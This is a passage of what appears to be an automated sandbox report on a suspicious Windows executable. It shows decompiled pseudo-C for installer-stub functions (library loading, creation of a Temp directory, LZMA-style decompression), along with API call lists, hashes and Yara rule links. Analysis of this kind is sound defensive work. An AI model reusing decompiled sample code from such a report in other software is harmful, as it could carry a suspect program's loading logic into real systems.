                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\RHK098760045678009000.exe" $C:\Users\user~1\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-3066672407
                • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF850D8, Relevance: 7.8, APIs: 5, Instructions: 274fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF85B65
                Memory Dump Source
                • Source File: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
                • Instruction ID: 46320f58fad21e60f9fa573cf4e1432c4d033ccb93c1fedba2f16b06173cc0a7
                • Opcode Fuzzy Hash: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
                • Instruction Fuzzy Hash: 42A1E025E54348EADB60CBE8EC11BBDB7B5AF48B10F20545BE519EE2E0D7710E90DB09
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                0x00401f84
                0x00401f84
                0x00401f89
                0x00401f90
                0x0040204c
                0x00402197
                0x00402197
                0x004028be
                0x004028c1
                0x004028cd
                0x004028cd
                0x00401f9f
                0x00401fa9
                0x00401fac
                0x00401fbb
                0x00401fbf
                0x00401fc5
                0x00401fc9
                0x00402045
                0x00000000
                0x00402045
                0x00401fcb
                0x00401fd5
                0x00401fd9
                0x0040201d
                0x00401fdb
                0x00401fde
                0x00401fe1
                0x00402011
                0x00401fe3
                0x00401fe6
                0x00401fef
                0x00401ff1
                0x00401ff1
                0x00401fef
                0x00401fe1
                0x00402025
                0x0040203a
                0x0040203a
                0x00000000
                0x00402025
                0x00401faf
                0x00401fb5
                0x00401fb9
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 2987980305-0
                • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                0x004015b3
                0x004015ba
                0x004015bd
                0x004015c2
                0x004015c6
                0x004015c8
                0x004015d0
                0x004015d2
                0x004015d4
                0x004015d8
                0x004015db
                0x004015f3
                0x004015f4
                0x004015dd
                0x004015dd
                0x004015e0
                0x00000000
                0x004015eb
                0x004015ec
                0x004015ec
                0x004015e0
                0x004015fb
                0x00401602
                0x0040160f
                0x0040160f
                0x00401604
                0x00401605
                0x0040160d
                0x00000000
                0x00000000
                0x0040160d
                0x00401602
                0x00401612
                0x00401615
                0x00401617
                0x00401618
                0x004015c8
                0x0040161f
                0x0040164a
                0x00402197
                0x00401621
                0x00401623
                0x0040162e
                0x00401634
                0x0040163c
                0x00401642
                0x00401642
                0x0040163c
                0x004028c1
                0x004028cd

                APIs
                  • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040572D
                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                  • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                Strings
                • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401629
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user~1\AppData\Local\Temp
                • API String ID: 1892508949-3107243751
                • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                Download Yara Rule
                C-Code - Quality: 99%
                			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
